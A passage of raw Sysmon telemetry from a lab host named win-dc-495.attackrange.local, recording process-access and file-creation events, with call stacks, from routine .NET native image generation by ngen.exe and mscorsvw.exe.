ws\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.564{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1314-0\CustomMarshalers.dll2021-01-18 13:44:57.564 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.470{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:57.470{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.314{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bf4-0\System.Web.Services.dll2021-01-18 13:44:57.314 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:58.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:58.017{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:58.017{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:59.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.533{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:59.533{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DB-6005-5D01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:59.439{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c10-0\System.Xaml.dll2021-01-18 13:44:59.439 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:02.954{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.939{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:02.939{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.861{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.845{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:02.845{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DE-6005-5F01-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:02.673{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8c0-0\WindowsBase.dll2021-01-18 13:45:02.673 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.970{59A5CD1D-8E46-6005-1400-00000000A301}13041440C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:03.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.861{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
